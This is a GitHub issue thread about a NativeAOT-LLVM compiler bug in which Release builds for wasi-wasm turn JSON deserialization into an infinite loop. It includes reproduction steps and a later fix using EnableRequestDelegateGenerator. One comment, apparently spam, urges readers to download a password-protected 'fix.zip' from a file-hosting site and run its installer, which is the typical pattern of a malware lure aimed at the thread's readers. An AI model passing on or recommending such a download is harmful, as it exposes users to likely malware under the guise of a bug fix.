### ISSUE TITLE
[NativeAOT-LLVM] Invalid Release code generation for `wasi-wasm`

### ISSUE THREAD

**Issue by dicej** [dotnet/runtimelab#2671]
I've been developing an AspNetCore example based on [wasi-http](https://github.com/WebAssembly/wasi-http).  One of the URI handlers in that example uses `System.Text.Json.Serialization` and source generation to deserialize request bodies.  When built using `-c Debug`, it all works fine.  However, the `-c Release` build is incorrect, having replaced the code for deserializing a custom `class` with an infinite loop.

I've tried to reduce the issue to a minimal reproduction, e.g. as a CLI app with a `Main` method, but so far I've only managed to reproduce this issue in an `AspNetCore` web server.  To reproduce:

- Clone [this repo](https://github.com/dicej/spin-dotnet-sdk)
- Install [the prerequisites](https://github.com/dicej/spin-dotnet-sdk?tab=readme-ov-file#prerequisites) as indicated in the README.md of that repo
    - Note that you can skip installing Spin and use Wasmtime instead, which may make debugging easier.  However, you'll need to build Wasmtime from source using [this commit](https://github.com/bytecodealliance/wasmtime/commit/27f09564fd16376f5b050bacda7184519f4ba48a) or later.
- Comment out [this line](https://github.com/dicej/spin-dotnet-sdk/blob/753cd44060c33b57519c667fd3ff3e868d7fd283/samples/http-aspnetcore/App.cs#L88) in the example source code.
- Follow [these instructions](https://github.com/dicej/spin-dotnet-sdk/tree/main?tab=readme-ov-file#aspnet-core-and-json-serialization) to build the example, but replace the `spin build -u` command with e.g. `dotnet publish -o build App.csproj -c Release && wasmtime serve -O pooling-table-elements=60000 -O pooling-max-core-instance-size=2000000 -S cli --dir static::/ build/App.wasm`
- In another terminal, use e.g. `curl -i localhost:8080/data -H 'content-type: application/json' -d '{"Greeting":"Hola"}'` to send a request to the problematic endpoint and note that the server loops forever without returning a response.
- Use e.g. `wasm-tools print build/App.wasm | less` to examine the Wasm file and search for `App_SpinHttpWorld_wit_exports_wasi_http_v0_2_0_AppJsonSerializerContext__global__System_Text_Json_Serialization_Metadata_IJsonTypeInfoResolver_GetTypeInfo`, noting [the infinite loop](https://gist.github.com/dicej/e89895a30df18989d1154964fe8a65bc#file-bad-wasm-wat-L67-L68) generated by the compiler.  Compare that with [the correct, expected code](https://gist.github.com/dicej/e89895a30df18989d1154964fe8a65bc#file-good-wasm-wat-L67-L75).

Apologies for the complicated steps to reproduce this.  Let me know if you have any trouble following them.

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dicej** [comment]
NB: I left out an important step above when I first opened the issue and just edited it in: "Comment out [this line](https://github.com/dicej/spin-dotnet-sdk/blob/753cd44060c33b57519c667fd3ff3e868d7fd283/samples/http-aspnetcore/App.cs#L88) in the example source code."

**Comment by dicej** [comment]
@SingleAccretion helped narrow this down and find a solution.  Turns out some of the warnings I was ignoring were important, and I needed `<EnableRequestDelegateGenerator>true</EnableRequestDelegateGenerator>`, which I had read about, but ignored because it's supposedly implied by `<PublishTrimmed>true</PublishTrimmed>`.  Turns out that's not always the case.  See the discussion following https://discord.com/channels/143867839282020352/1141126727028985877/1278474370842628116 for details.
